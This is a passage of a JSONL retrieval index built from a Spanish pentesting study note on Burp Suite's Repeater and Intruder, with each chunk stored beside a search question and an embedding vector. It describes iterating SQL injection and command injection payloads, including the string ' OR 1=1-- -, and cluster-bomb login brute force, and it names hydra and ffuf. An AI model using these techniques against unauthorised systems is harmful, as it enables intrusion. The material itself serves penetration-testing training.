0.06872, 0.11702, -0.07053, 0.0467, -0.00846, -0.00659, -0.06917, -0.01314, 0.01843, -0.04012, -0.05558, -0.00158, 0.06374, 0.00176, -0.11846, -0.02055, -0.13139, -0.08004, 0.01172, -0.06615, 0.10223, -0.17563, -0.05548, -0.00609, -0.08955, -0.00233, -0.01922, -0.1154, 0.03137, 0.0298, 0.02945, 0.00137, -0.1237, 0.02096, -0.07703, 0.12838, 0.06788, -0.15486, -0.01682, 0.03954, 0.01881, -0.03277, 0.0433, 0.00236, 0.02838, 0.02476, 0.08077, 0.08822, -0.01456, -0.0565, 0.09069, 0.01813, 0.03025, -0.02254, 0.01997, -0.0062, -0.10358, 0.06431, 0.02219, -0.02259, 0.16549, 0.01884, 0.03443, 0.06462, 0.12033, -0.04141, -0.12606, 0.03458, 0.05373, 0.15559, 0.0911, -0.06566, -0.06466, 0.00525, 0.07641, 0.00712, 0.00055, -0.00553, -0.06699, -0.03376, -0.05074, -0.01246, 0.01656, -0.05534, -0.03587, 0.05642, -0.06266, 0.0356, 0.09574, -0.06604, 0.05963, 0.0809, 0.08381, 0.01209, -0.05529, -0.00273, 0.02555, -0.04783, -0.03439, -0.06171, 0.04695, -0.02548, -0.03973, -0.03613, 0.05911, 0.02513, 0.01849, 0.00912, 0.05106, 0.01128, 0.10526, -0.09605, -0.03708, -0.01121, 0.01417, 0.01872, 0.01278, 0.03461, -0.11115, 0.01056, 0.08633, -0.01151, -0.11489, -0.01134, -0.03772, 0.01996, 0.00847, -0.02231, 0.04758, -0.03804, 0.0151, 0.05718, 0.06979, 0.06563, -0.02786, 0.03415, -0.0171, 0.02937, -0.07711, -0.05276, -0.05566, -0.09467, 0.02591, 0.01828, -0.079, 0.00298, -0.0291, 0.03215, -0.05359, -0.02994, -0.06885, 0.01779, -0.03818, -0.00796, 0.00718, -0.02109, -0.03758, -0.00206, 0.01912, -0.11005, -0.0603, -0.05503, 0.08848, -0.04834, -0.07666, -0.02383, 0.0023, -0.03553, 0.00209, 0.07343, -0.05284, 0.03969, 0.0312, 0.07967, -0.01342, -0.04454, 0.0705, 0.00531, -0.02138, -0.01085, 0.03742, -0.01104, -0.0506, -0.05307, 0.01839, -0.00084, 0.03291, 0.03826, 0.03857, 0.00114, 0.03506, 0.04031, 0.05506, 0.00673, -0.10207, -0.04526, -0.0184, -0.02542, 0.03021, -0.03383, -0.00056, -0.04216, 0.00967, -0.07676, -0.01541, 0.09554, -0.03056, -0.08983, -0.03376, -0.00088, -0.05078, 0.0077, -0.04069, 0.00835, 0.05424, -0.01813, 0.03975, -0.05867, 0.05639, -0.00707]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Burp Repeater e Intruder\n\n> Las dos pestaΓ±as de trabajo de Burp Suite: **Repeater** para probar a mano, **Intruder** para automatizar.", "indexar": "con que puedo probar manualmente ataques personalizados", "v": [0.16505, 0.2137, -0.20971, -0.10067, -0.01019, 0.03026, 0.11944, 0.01202, -0.10383, -0.06819, 0.04256, 0.03424, 0.04505, -0.06722, -0.06975, 0.02429, 0.05594, -0.06495, 0.05005, 0.0124, 0.06252, -0.0767, -0.10804, -0.02406, 0.02742, -0.00102, 0.08599, 0.04349, -0.12424, -0.07126, -0.02441, 0.0195, 0.06555, -0.00242, -0.03722, -0.03226, -0.05955, 0.00639, 0.07688, 0.0603, 0.05832, -0.01684, -0.13693, 0.01734, 0.0781, 0.08682, 0.02749, 0.0609, -0.06378, -0.03876, -0.00895, -0.01479, -0.10245, -0.06424, -0.04829, -0.08828, 0.17476, -0.07741, 0.07603, 0.00572, -0.00934, 0.07243, 0.06259, 0.07094, 0.10723, -0.05206, -0.03123, -0.08075, -0.09804, 0.08254, -0.01023, 0.01014, -0.08059, 0.02715, 0.03266, 0.01834, 0.02791, 0.08129, 0.14855, -0.03133, -0.07712, -0.05764, -0.05137, 0.01384, -0.09178, -0.08404, -0.03333, -0.04148, -0.0256, -0.11658, 0.10505, -0.1042, -0.03551, -0.02195, -0.04114, 0.00511, 0.11937, -0.02716, -0.02165, -0.01111, 0.06723, -0.04658, -0.06102, 0.11068, 0.02699, 0.02527, 0.00108, 0.01572, 0.03416, -0.10202, -0.08304, -0.04006, -0.09428, 0.0179, 0.01315, -0.04069, -0.07053, -0.05009, 0.00197, -0.0132, -0.12039, -0.06704, -0.05409, 0.00757, 0.00617, -0.0188, -0.03712, 0.05734, -0.05405, -0.03252, 0.01448, 0.06275, 0.03798, 0.01156, 0.00356, 0.09834, -0.03821, -0.06752, -0.00155, 0.00547, 0.02692, 0.10828, 0.04725, -0.04003, 0.06605, 0.01941, -0.08892, -0.04926, -0.04381, 0.04855, 0.05075, 0.00102, 0.06105, 0.09694, -0.08634, -0.03044, -0.00989, -0.05684, -0.02006, 0.16571, -0.00226, 0.0798, -0.05249, 0.07428, 0.00653, -0.017, -0.03541, -0.04389, 0.09177, 0.037, -0.07327, 0.07776, -0.0317, -0.03086, 0.05435, -0.01422, 0.00109, -0.05612, 0.03242, -0.03453, -0.01194, -0.02287, -0.03583, -0.04265, -0.02145, -0.07585, 0.07039, 0.03007, 0.10827, 0.04706, -0.00733, 0.06651, -0.01543, 0.03333, 0.02313, 0.00854, -0.04673, -0.01346, -0.09615, 0.00181, 0.04472, 0.01156, -0.0403, -0.05746, 0.05656, 0.05981, -0.06458, 0.033, 0.02193, 0.04128, 0.03307, -0.0404, 0.13757, -0.05962, -0.06937, 0.03771, 0.0314, -0.05574, -0.02057, 0.01945, 0.02919, -0.02981, 0.1218, 0.01102, -0.00362, -0.0116, 0.03868, -0.03216, 0.03557, 0.06897, -0.00203, 0.04181, -0.03101, -0.07644, 0.0775, 0.02829, 0.07591, -0.01285, -0.08792, 0.004, 0.03722, 0.06818, -0.03099, -0.05051, -0.0415, -0.08991, -0.09308, 0.01232, -0.00961, -0.03754, 0.00544, 0.06914, 0.00954, 0.00022, 0.01553, -0.04031]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Burp Repeater e Intruder\n\n> Las dos pestaΓ±as de trabajo de Burp Suite: **Repeater** para probar a mano, **Intruder** para automatizar.", "indexar": "hay alguna alternativa libre a Burp Repeater e Intruder", "v": [-0.1367, 0.00609, -0.1631, 0.01135, -0.01795, 0.09088, 0.12802, -0.0444, -0.08524, -0.17346, -0.14231, -0.02368, 0.1383, -0.00154, 0.06175, -0.09827, -0.24611, -0.01469, 0.16175, -0.04767, 0.02876, 0.19945, -0.08739, 0.038, 0.008, -0.05801, -0.15577, 0.02298, 0.00841, 0.07114, -0.01826, 0.0025, 0.07313, -0.04433, -0.15488, -0.02127, 0.183, 0.03392, 0.08116, -0.04734, 0.00487, -0.01421, -0.02299, 0.1185, -0.02135, -0.00541, -0.15261, 0.09714, 0.00466, 0.09351, -0.10295, -0.0319, -0.02718, 0.01693, 0.07922, 0.01144, 0.04088, -0.02933, -0.0932, -0.07646, -0.03947, 0.14387, -0.02956, -0.06768, -0.00724, 0.00641, -0.07075, -0.08294, 0.00535, 0.04898, 0.00886, -0.02248, 0.03811, -0.02282, -0.11357, 0.02392, -0.14122, 0.01634, 0.0104, 0.05868, 0.026, -0.08942, -0.02692, -0.04566, -0.02193, -0.08324, 0.09932, -0.13534, -0.01616, 0.02816, 0.05443, 0.01525, 0.05661, 0.14748, 0.01876, -0.12512, -0.00248, 0.12216, -0.00416, 0.02517, 0.09583, 0.09112, -0.05732, -0.03227, 0.04386, -0.01304, -0.02443, 0.06809, -0.01183, 0.02039, 0.04068, 0.04755, -0.06921, -0.03912, -0.04866, -0.04658, -0.05905, 0.01931, 0.0285, -0.00343, -0.06458, -0.02173, 0.01888, -0.05687, -0.01402, 0.04662, -0.00175, 0.01453, -0.00955, 0.03268, 0.01903, -0.02457, -0.02127, -0.09474, -0.06719, -0.08522, -0.01004, 0.00654, 0.00786, 0.03272, -0.09192, -0.00701, 0.00456, -0.03525, -0.05992, -0.02932, 0.05419, -0.08275, 0.01816, -0.09809, -0.01703, 0.00933, 0.01362, 0.14169, 0.00894, 0.01051, -0.03115, -0.02096, 0.02011, 0.12041, 0.01961, -0.04296, -0.06341, 0.02456, 0.03301, 0.07441, -0.02442, -0.03332, -0.09304, 0.05019, -0.00815, 0.06761, 0.03891, -0.03629, 0.05889, -0.02013, -0.00942, -0.07704, 0.03893, -0.03784, 0.04312, 0.06198, -0.05409, -0.02185, 0.00308, -0.09313, -0.01008, 0.08839, -0.015, -0.02226, 0.00845, -0.02142, -0.01794, -0.05051, -0.01913, 0.0356, -0.00392, -0.04093, -0.01544, 0.0042, -0.08551, -0.05637, -0.0286, -0.03821, -0.01018, 0.01319, -0.00579, 0.04201, 0.04938, 0.0339, 0.03897, 0.00937, 0.04818, -0.00859, -0.05454, -0.00277, 0.05851, 0.02299, -0.03782, 0.01275, 0.06172, 0.05061, 0.02194, 0.03909, 0.0126, 0.02925, 0.06578, 0.03141, -0.04144, 0.00725, 0.02353, -0.01493, 0.01866, -0.0083, -0.01634, 0.01481, 0.01586, 0.03019, 0.02793, 0.01861, 0.07707, -0.01797, 0.02746, -0.02421, 0.02733, 0.00658, -0.07385, 0.00327, -0.00777, 0.01019, -0.02419, 0.04837, -0.04556, 0.01261, 0.00509, 0.00218]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Repeater (manual, tu favorito en OSCP)\n- `Ctrl+R` envΓ­a una peticiΓ³n capturada aquΓ­.\n- Editas cualquier parte (param, header, cookie, body) y **Send** β†’ ves la respuesta al instante.\n- Ideal para iterar payloads de SQL injection, Command injection, SSTI, Directory traversal sin recargar el navegador.\n- Flujo: marca la peticiΓ³n sospechosa β†’ `Ctrl+R` β†’ prueba `'`, luego `' OR 1=1-- -`, observa el cambio.", "indexar": "quΓ© herramienta sirve para probar inyecciones SQL sin recargar la pΓ‘gina", "v": [-0.11287, 0.01566, -0.13033, -0.19469, 0.13774, -0.31567, -0.08196, -0.13153, 0.08153, -0.0556, -0.20836, -0.14566, 0.09689, -0.10628, -0.05754, 0.08149, -0.01176, -0.10906, -0.04061, 0.00091, 0.11086, 0.01295, -0.06887, -0.1638, -0.08674, -0.01212, 0.0298, 0.04037, -0.14607, -0.03245, -0.10537, -0.01191, 0.11439, -0.01559, -0.09515, -0.0165, 0.07328, 0.00574, 0.00437, -0.05316, -0.00085, -0.0197, -0.14451, 0.05865, -0.00578, 0.06254, 0.07788, 0.01022, -0.03951, 0.09322, -0.07004, -0.0575, -0.11024, -0.03276, -0.08466, -0.03095, 0.09554, -0.06113, 0.08627, -0.03236, -0.0657, -0.02328, 0.01386, -0.07813, -0.00757, -0.02168, -0.0099, -0.06547, -0.04741, 0.04845, -0.10601, 0.01087, 0.01678, -0.07105, -0.02012, -0.07159, 0.09188, 0.0514, 0.06708, -0.00409, 0.00723, -0.02699, -0.11527, 0.05121, 0.0005, -0.02237, 0.08716, 0.05996, 0.08828, -0.07316, 0.05091, 0.04361, 0.04184, 0.03489, -0.03076, -0.02494, 0.08468, -0.03187, 0.04096, -0.04847, 0.11997, -0.09815, -0.01397, 0.10491, 0.00775, 0.04603, -0.01267, -0.04914, -0.009, -0.05169, 0.14662, -0.07382, -0.07219, -0.01327, -0.00256, 0.10388, 0.00904, 0.03723, -0.09792, -0.01749, 0.00628, 0.0106, -0.03698, -0.00494, 0.02056, 0.03939, -0.0306, 0.00824, -0.0119, -0.04101, 0.02786, -0.03553, -0.04207, 0.00978, 0.00893, -0.06699, 0.01115, -0.12546, -0.08238, -0.03239, 0.01084, 0.00536, -0.04725, -0.07991, 0.00574, -0.01251, 0.07346, 0.05718, -0.06016, 0.03297, 0.01375, -0.07636, 0.04069, 0.01822, -0.07517, -0.02299, 0.06598, 0.00182, -0.07873, 0.01315, -0.04156, -0.06596, 0.05394, 0.06943, -0.01397, -0.0246, -0.04115, -0.05934, 0.05763, 0.067, 0.06616, 0.01113, 0.05093, -0.07865, 0.00063, -0.03912, -0.07678, -0.00135, 0.06699, -0.06459, 0.00988, -0.0153, -0.03665, -0.01068, -0.0018, -0.03877, -0.00623, -0.02291, 0.02604, -0.01778, -0.00506, 0.01171, -0.01198, -0.09629, 0.07085, 0.00943, 0.00617, -0.08024, 0.04545, 0.00468, -0.02405, -0.07634, -0.06472, -0.02884, 0.02576, 0.0037, -0.03831, 0.04637, -0.013, -0.04817, 0.00739, -0.01909, 0.06972, 0.02022, -0.02038, -0.07381, 0.02924, 0.00184, -0.0103, 0.02368, 0.02398, 0.03421, 0.01853, 0.02599, 0.00051, 0.0357, 0.02822, -0.0337, 0.01725, 0.03365, 0.04174, 0.01081, -0.02441, 0.02057, 0.02628, -0.02174, 0.02953, 0.01592, -0.0642, -0.06427, 0.01439, 0.04675, -0.0158, 0.00032, -0.00967, -0.01482, -0.02017, -0.02565, -0.05127, -0.05623, -0.05149, -0.02926, 0.02103, 0.01674, 0.01518, -0.0184]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Repeater (manual, tu favorito en OSCP)\n- `Ctrl+R` envΓ­a una peticiΓ³n capturada aquΓ­.\n- Editas cualquier parte (param, header, cookie, body) y **Send** β†’ ves la respuesta al instante.\n- Ideal para iterar payloads de SQL injection, Command injection, SSTI, Directory traversal sin recargar el navegador.\n- Flujo: marca la peticiΓ³n sospechosa β†’ `Ctrl+R` β†’ prueba `'`, luego `' OR 1=1-- -`, observa el cambio.", "indexar": "con quΓ© puedo editar las cabeceras y cookies de una peticiΓ³n capturada rΓ‘pidamente", "v": [0.09302, 0.0479, -0.0877, 0.03235, 0.02953, -0.17736, 0.03885, 0.20451, -0.0286, -0.12406, -0.03774, 0.05761, -0.12047, -0.04161, -0.00015, -0.0732, 0.16208, 0.21281, 0.15394, -0.11294, 0.11871, -0.04893, -0.02014, 0.07808, 0.00336, -0.04827, 0.10772, 0.06246, -0.07511, -0.1353, -0.02434, 0.04464, 0.00049, 0.08586, -0.0968, 0.04374, -0.10613, -0.025, -0.04129, -0.04837, -0.08732, 0.06144, -0.05811, -0.07623, 0.03262, -0.10053, 0.01126, 0.03344, 0.00677, -0.03855, 0.10486, -0.02451, -0.14687, -0.04469, -0.16367, 0.14323, 0.11929, -0.1062, -0.03034, 0.04162, -0.05758, 0.03129, 0.024, -0.03738, 0.0294, -0.00626, -0.04321, -0.09749, 0.11894, 0.00563, 0.0532, 0.01196, 0.06374, -0.03685, 0.09152, -0.04523, -0.12176, 0.06525, 0.04119, 0.01456, -0.00689, -0.08169, -0.05202, 0.01509, -0.00494, 0.08521, -0.04876, -0.08318, -0.04871, -0.08322, 0.08808, 0.1166, 0.00818, -0.03104, -0.04735, 0.00278, 0.00524, 0.02315, -0.03016, 0.00772, 0.0425, 0.04521, -0.09374, 0.1227, 0.05399, 0.00607, -0.01882, -0.05553, 0.00863, 0.04893, -0.11581, 0.01079, -0.02693, 0.03363, 0.02852, 0.08191, -0.08937, -0.02082, -0.06222, -0.10425, -0.00386, -0.05932, -0.02452, -0.10649, 0.00617, -0.00121, -0.05245, 0.03659, -0.02764, -0.06448, -0.07304, 0.01797, 0.00442, 0.0375, -0.03535, 0.01879, 0.03656, 0.00922, 0.0532, -0.02845, -0.08688, -0.04104, 0.06372, -0.06994, 0.03137, 0.02269, -0.03647, 0.01241, -0.01838, -0.08828, 0.07813, -0.10477, -0.00707, -0.03766, 0.0188, 0.03238, 0.05351, -0.04522, 0.0204, 0.04126, -0.01285, -0.00454, -0.06827, 0.03224, 0.01131, -0.11909, -0.08094, -0.03036, 0.05219, 0.05212, -0.06094, -0.06784, -0.06477, 0.00935, 0.10834, -0.02945, -0.02209, -0.08752, -0.0157, -0.05065, -0.09011, 0.03362, 0.00469, -0.00782, 0.00703, -0.05748, 0.00672, 0.06706, -0.02646, 0.03738, 0.0623, 0.00805, 0.00298, -0.01945, 7e-05, -0.05722, -0.02673, 0.0401, 0.06653, 0.03292, 0.03568, -0.06998, 0.01264, 0.01484, -0.05406, -0.01163, -0.08903, 0.01587, -0.00377, -0.00518, -0.04087, -0.00214, 0.0462, -0.0221, 0.08105, -0.0413, 0.03905, 0.04109, 0.03305, 0.00208, 0.02545, 0.07693, 0.0187, 0.0517, -0.0171, 0.03288, 0.02618, 0.06692, 0.00605, 0.02715, -0.02893, 0.04064, -0.03411, -0.00088, 0.05144, -0.00861, -0.02857, -0.00615, -0.02876, -0.02093, 0.03559, 0.05817, -0.0748, 0.027, 0.03657, -0.00492, -0.07013, 0.0165, 0.06744, -0.06828, -0.02488, 0.02974, 0.02837, -0.02591, 0.03815, -0.01637]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Repeater (manual, tu favorito en OSCP)\n- `Ctrl+R` envΓ­a una peticiΓ³n capturada aquΓ­.\n- Editas cualquier parte (param, header, cookie, body) y **Send** β†’ ves la respuesta al instante.\n- Ideal para iterar payloads de SQL injection, Command injection, SSTI, Directory traversal sin recargar el navegador.\n- Flujo: marca la peticiΓ³n sospechosa β†’ `Ctrl+R` β†’ prueba `'`, luego `' OR 1=1-- -`, observa el cambio.", "indexar": "hay algΓΊn programa que me ayude a iterar payloads de comandos e inyecciones sin reiniciar el navegador", "v": [0.13051, 0.13894, -0.10705, -0.0546, 0.11816, -0.05007, 0.08092, -0.10514, -0.12454, -0.06503, -0.10607, -0.04426, 0.01523, -0.0221, -0.10855, 0.11017, 0.08127, 0.07416, -0.01032, -0.04732, 0.05706, 0.01179, 0.00927, 0.0099, 0.0446, 0.111, -0.04441, -0.00453, -0.14986, -0.1376, -0.09323, 0.07743, 0.1334, -0.07897, -0.07341, 0.00265, 0.0876, 0.02935, -0.02424, 0.04572, -0.05366, -0.01739, -0.15928, 0.06701, 0.00471, -0.03227, 0.02333, -0.0093, 0.10111, -0.11239, 0.00063, -0.0524, -0.08535, -0.02469, -0.01693, 0.01414, 0.15682, -0.08161, -0.03462, -0.04569, -0.00013, 0.03225, 0.0324, 0.02772, -0.03569, -0.07419, 0.028, -0.09605, -0.0448, 0.01515, -0.03161, 0.03686, -0.0657, 0.03799, 0.03168, -0.00932, -0.03201, 0.01288, 0.12468, 0.06935, 0.05231, -0.00613, -0.04383, 0.07851, -0.0469, -0.0858, -0.03493, 0.01784, 0.04836, -0.11987, 0.08626, 0.04923, -0.05833, 0.09452, 0.01547, 0.01165, 0.14395, 0.02996, 0.0911, 0.04899, 0.035, -0.04451, 0.03207, 0.13006, 0.06768, 0.08582, 0.06058, -0.15942, 0.03271, 0.0413, 0.11103, -0.09913, 0.00858, -0.08617, -0.09301, -0.0359, -0.04484, -0.00589, -0.01344, -0.11845, -0.17223, 0.0385, -0.0184, 0.0444, 0.07396, 0.01218, -0.07249, 0.07306, 0.0493, 0.05545, -0.03855, 0.0203, 0.06723, -0.04175, -0.08507, 0.04692, -0.00232, -0.00965, -0.0462, -0.04118, 0.08429, 0.05687, 0.0704, 0.05629, 0.09186, 0.0253, 0.03537, -0.05126, -0.0723, -0.02841, 0.05847, 0.07155, 0.00473, 0.03333, -0.05746, -0.01413, 0.05072, 0.01937, -0.00903, 0.03339, -0.05215, 0.07662, 0.00108, 0.01012, 0.009, -0.05296, -0.08309, 0.0116, 0.04523, 0.11734, -0.01739, 0.00837, 0.01197, -0.02653, 0.01231, -0.06815, -0.04582, -0.05038, 0.07406, 0.01513, -0.08215, 0.04739, 0.00732, 0.03351, -0.03451, -0.07399, -0.10637, 0.06343, -0.01658, 0.01983, 0.04464, 0.07664, -0.07247, -0.05859, 0.07884, 0.00949, -0.0326, 0.01884, -0.01038, -0.00313, -0.02009, -0.00234, -0.02938, -0.05603, 0.03428, 0.04976, -0.06672, 0.03261, 0.07743, 0.04499, 0.04001, -0.09514, 0.10462, 0.02269, -0.03103, -0.05037, 0.04516, 0.03128, 0.00657, 0.01369, 0.02932, 0.0531, 0.05821, -0.00184, 0.00753, -0.04112, 0.07237, 0.02096, 0.07731, 0.04014, -0.00721, 0.00833, -0.0471, -0.05125, 0.04288, 0.00673, 0.0005, -0.06188, -0.02617, -0.01559, 0.02779, 0.05317, 0.00674, -0.10709, -0.00916, -0.0223, -0.06037, 0.01591, -0.02541, 0.03998, -0.00209, 0.04973, -0.01644, -0.08687, 0.02144, -0.00182]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Intruder (automatizar payloads)\n- `Ctrl+I` envΓ­a aquΓ­. Marcas **posiciones** con `Add Β§` (Burp pone `Β§payloadΒ§`).\n- Tipos de ataque:\n```\nSniper β†’ 1 lista, 1 posiciΓ³n a la vez (fuzzing de un parΓ‘metro)\nBattering ram β†’ 1 lista, misma en todas las posiciones\nPitchfork β†’ N listas en paralelo (user[1]+pass[1], user[2]+pass[2]...)\nCluster bomb β†’ todas las combinaciones (user Γ— pass) β†’ fuerza bruta de login\n```\n- **Community va ralentizado** (throttle). Para fuerza bruta seria de login usa **hydra**; para fuzzing de rutas/params usa **ffuf** β†’ Content discovery.", "indexar": "quΓ© herramienta sirve para hacer fuerza bruta en logins?", "v": [0.00078, 0.02368, -0.23, -0.118, -0.00615, -0.05511, -0.0381, -0.022, 0.01409, -0.134, -0.09727, 0.0182, 0.0204, 0.06251, 0.01252, -0.05824, 0.00301, -0.15094, -0.13497, -0.06729, -0.04617, -0.06387, -0.00043, -0.10273, -0.15811, -0.0607, 0.03866, 0.07402, -0.20377, 0.05751, 0.01053, 0.11278, 0.13326, -0.0775, -0.04425, 0.01764, -0.04478, 0.04532, 0.09513, 0.12468, -0.08106, 0.11146, -0.04418, 0.01913, -0.01328, 0.02753, -0.00484, 0.04477, -0.02022, 0.11779, -0.10276, -0.15907, -0.03302, -0.05835, -0.06577, -0.19463, 0.09839, -0.15737, -0.10399, -0.0227, -0.14086, 0.03153, -0.07949, -0.07125, -0.04513, -0.02252, -0.01755, -0.07932, 0.00917, 0.00925, -0.17774, -0.04986, -0.01665, -0.04712, -0.08027, -0.02392, 0.01881, 0.06005, -7e-05, -0.01042, 0.03214, 0.02362, -0.16332, -0.05148, -0.05779, -0.06061, 0.08769, -0.00486, -0.00168, -0.05885, 0.02599, 0.05154, 0.01177, 0.00186, 0.02318, 0.04451, -0.00432, 0.00188, -0.01633, -0.07088, 0.07213, -0.1309, -0.05167, -0.04211, 0.03855, -0.0671, -0.06465, 0.00677, -0.09317, 0.07824, 0.06646, -0.02328, -0.0662, 0.06203, -0.0055, 0.10368, -0.07707, -0.11125, -0.0403, 0.00266, -0.01649, 0.02271, -0.05377, 0.00088, -0.04899, 0.05371, 0.05012, 0.07556, 0.02434, -0.11566, 0.03145, -0.0389, 0.00305, 0.01688, 0.02032, -0.08518, 0.06491, -0.14699, -0.02872, -0.09378, 0.01797, 0.02676, 0.00059, -0.1203, 0.03127, 0.04672, 0.05717, 0.00591, -0.03597, -0.01259, 0.09352, -0.09534, -0.0006, 0.05748, -0.03782, -0.03845, 0.01112, -0.0371, -0.10241, 0.01292, -0.04995, -0.09196, -0.04339, -0.02921, 0.00683, -0.01285, -0.04092, -0.0149, 0.03708, 0.04002, 0.02737, -0.02647, 0.10928, 0.0162, 0.04373, -0.06047, -0.03567, 0.06463, -0.0373, -0.00745, 0.00338, 0.0033, 0.00047, -0.00386, 0.02605, -0.00667, 0.0611, -0.04978, 0.0159, 0.04115, -0.03128, 0.05667, -0.02485, -0.02503, 0.01418, -0.01499, -0.02676, -0.01979, 0.02963, 0.00217, 0.00017, -0.04791, 0.02176, -0.03352, 0.06421, 0.06269, 0.01778, -0.0419, 0.00313, 0.00906, 0.00621, 0.03022, 0.01707, -0.05048, -0.01442, -0.00671, -0.02918, 0.03585, -0.00683, 0.00184, -0.01445, 0.00988, -0.02293, 0.00144, -0.00475, 0.05498, 0.03754, -0.06764, 0.0014, 0.03447, 0.02627, -0.06545, -0.01749, 0.02221, -0.01804, -0.06749, 0.02487, 0.0249, -0.07246, 0.01384, -0.0231, 0.05287, -0.00362, -0.03373, -0.06973, -0.0108, 0.02389, -0.03131, -0.04539, -0.04018, -0.02041, -0.01036, 0.07746, -0.00094, 0.02368, -0.01988]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Intruder (automatizar payloads)\n- `Ctrl+I` envΓ­a aquΓ­. Marcas **posiciones** con `Add Β§` (Burp pone `Β§payloadΒ§`).\n- Tipos de ataque:\n```\nSniper β†’ 1 lista, 1 posiciΓ³n a la vez (fuzzing de un parΓ‘metro)\nBattering ram β†’ 1 lista, misma en todas las posiciones\nPitchfork β†’ N listas en paralelo (user[1]+pass[1], user[2]+pass[2]...)\nCluster bomb β†’ todas las combinaciones (user Γ— pass) β†’ fuerza bruta de login\n```\n- **Community va ralentizado** (throttle). Para fuerza bruta seria de login usa **hydra**; para fuzzing de rutas/params usa **ffuf** β†’ Content discovery.", "indexar": "cuΓ‘l programa automatiza el fuzzing combinando mΓΊltiples listas de usuario y contraseΓ±a?", "v": [0.19014, 0.1042, -0.16121, -0.0978, 0.00427, -0.05761, -0.05082, -0.12423, -0.21047, -0.15818, -0.01511, -0.03813, -0.05035, 0.06808, 0.00177, -0.04259, 0.0403, -0.0691, -0.02417, 0.03439, 0.08992, -0.07608, -0.0127, -0.10164, -0.10165, -0.03112, 0.08073, -0.03296, -0.07047, -0.05837, 0.07433, 0.04098, 0.02224, -0.04463, 0.04578, 0.05445, 0.05815, 0.07587, -0.03402, -0.02069, 0.04761, 0.1125, -0.17407, 0.07641, 0.00485, 0.06487, 0.00055, 0.02445, 0.07486, -0.01673, -0.02438, -0.01602, -0.0214, -0.03288, 0.11957, -0.18509, 0.07985, -0.0983, 0.00153, -0.01912, 0.04608, 0.01491, 0.04087, 0.11002, -0.11888, -0.05883, 0.04886, -0.04137, 0.00261, 0.10729, 0.04785, -0.01299, -0.04016, -0.06976, 0.02571, 0.11769, 0.06022, -0.00173, 0.04182, 0.0557, -0.04031, -0.10227, 0.00828, 0.0068, -0.05971, -0.05746, 0.10995, -0.0582, 0.02438, -0.0402, 0.05842, -0.02278, -0.02986, 0.07002, 0.1064, -0.04005, 0.09297, 0.00151, -0.01661, 0.02692, 0.07575, 0.05729, -0.10312, 0.15177, -0.05765, 0.01568, 0.06812, -0.02978, 0.02154, -0.09617, 0.00931, -0.01793, -0.00651, -0.1098, -0.04864, -0.03711, -0.04265, -0.06236, 0.04886, -0.07306, -0.05769, 0.00601, -0.03164, -0.02532, 0.0753, 0.01304, 0.01609, 0.11772, -0.02631, -0.02736, -0.0152, 0.09395, -0.07256, -0.02917, -0.01568, 0.03717, -0.01284, -0.0867, -0.06573, -0.04417, 0.05503, 0.0933, 0.09127, -0.00883, 0.11373, -0.03865, 0.04719, -0.0575, -0.06986, 0.10072, -0.05509, -0.00506, -0.00137, 0.02819, -0.0293, 0.00243, -0.00547, -0.06468, -0.05633, 0.05495, -0.00928, 0.0005, -0.05181, 0.02492, -0.00022, -0.02982, 0.04323, 0.02247, 0.06485, -0.0198, 0.04467, 0.07565, -0.00327, -0.02505, -0.08735, -0.03913, -0.00983, -0.04352, 0.0164, -0.03887, -0.10194, -0.01692, 0.0193, -0.03173, -0.00067, -0.07668, 0.01719, 0.00529, 0.04834, 0.02745, -0.01542, 0.02416, -0.05354, 0.02771, 0.02583, -0.0459, -0.01484, -0.0361, -0.00063, -0.12168, -0.06242, 0.02524, -0.02967, -0.07596, 0.06198, 0.11724, -0.06146, 0.00352, 0.02397, 0.00837, 0.05833, -0.09424, 0.06067, -0.05465, -0.04546, -0.0796, -0.04451, 0.00646, 0.01858, 0.00371, 0.03329, 0.04186, 0.0369, 0.04689, -0.02974, -0.01326, 0.04966, 0.08039, 0.0465, 0.00975, -0.05804, 0.03498, -0.00237, -0.02546, 0.07259, 0.01199, -0.00965, -0.00467, -0.07445, -0.08688, -0.00843, 0.10439, -0.01073, -0.08596, -0.04096, -0.0023, -0.08879, 0.04368, 0.01167, -0.05235, -0.05263, 0.09497, 0.02339, -0.04457, 0.03584, -0.03766]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Intruder (automatizar payloads)\n- `Ctrl+I` envΓ­a aquΓ­. Marcas **posiciones** con `Add Β§` (Burp pone `Β§payloadΒ§`).\n- Tipos de ataque:\n```\nSniper β†’ 1 lista, 1 posiciΓ³n a la vez (fuzzing de un parΓ‘metro)\nBattering ram β†’ 1 lista, misma en todas las posiciones\nPitchfork β†’ N listas en paralelo (user[1]+pass[1], user[2]+pass[2]...)\nCluster bomb β†’ todas las combinaciones (user Γ— pass) β†’ fuerza bruta de login\n```\n- **Community va ralentizado** (throttle). Para fuerza bruta seria de login 